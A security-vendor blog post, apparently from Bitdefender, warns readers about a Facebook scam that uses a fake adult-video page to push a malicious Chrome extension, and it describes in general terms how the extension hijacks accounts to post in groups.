You Are Here: Home » Industry News » Beware, Facebook Scam Shares Porn on Your Groups!

Beware, Facebook Scam Shares Porn on Your Groups!

A new Facebook tag scam is spreading pornographic content in Facebook groups, Bitdefender warns.

We came across an evolved version of the known Facebook tag scam that manages to infiltrate Facebook groups to spread havoc on people’s Walls.

1

It all starts with a link that leads to a legitimate-looking Facebook page. The page promises to display a “Secret +18 Video”.

2

Once you hit the “Play” video button, you are asked to install a Chrome extension. Well, you probably think it is some kind of extension necessary in order to play video files. But, hold on a second! Since when do you need an extension to play a YouTube video in Chrome, right?

The extension calls itself “Fome He” in this case, and has infected 3,070 users. The name differs (another example is “Loviv”) from one infection to another because after receiving tons of reports, Google will most likely decide to block the extension. And then, the writers of the malware will have to upload another extension.

Looking at the source of the page, we can see that the page is “pure static”, in sense that no action can be taken on it. This is just a “trick” and every action taken on this page results in asking you to install the extension.

One installed, users are redirected to an authentic Facebook login page, if you are not logged in.

3

The installed extension contains the following files & directory:

  1. akeka.js
  2. 9 directories with random names

The 9 random named directories contain files with random names and irrelevant data in size of approximately 7,8 KB.

The akeka.is file is used to make a request to a hardcoded URL and to execute a new script. The downloaded script collects data such as user ID and the browser timestamp and helps modify the user’s Facebook privacy settings.

4

Next, the malware will extract the full list of groups the infected users is part of. It randomly selects a maximum of 10 groups (the limit is specified in the config object). It creates a fake page under the same user where it posts the image of the Play button.

Also, while analyzing the entire JavaScript we were able to see some portion of code that never executes. The functionality of the code seems to be responsible with adding new friends. So we suppose that it is a beta version of a functionality to add friends as it can be seen from the function code.

The entire execution flow is showed in the next diagram:

8

Here you can see the activity on the account after couple of minutes:

5

And the menu under the new created page:

6

Also if you go to Activity Log from the account, you can see a list of posts that were made on different groups.

7

Remember, don’t click anything that looks fishy, regardless of how shocking or inciting it appears to be. Hackers count on your curiosity to make you part of the scam. Stay safe!

The technical information is provided courtesy of Victor Luncasu, malware researcher at Bitdefender.

About The Author

Security Specialist

Alexandra started writing about IT at the dawn of the decade – when an iPad was an eye-injury patch, we were minus Google+ and we all had Jobs. She has since wielded her background in PR and marketing communications to translate binary code to colorful stories that have been known to wear out readers’ mouse scrolls. Alexandra is also a social media enthusiast who `likes’ only what she likes and LOLs only when she laughs out loud.

Number of Entries : 244

Leave a Comment

© 2012 Powered By Bitdefender

Scroll to top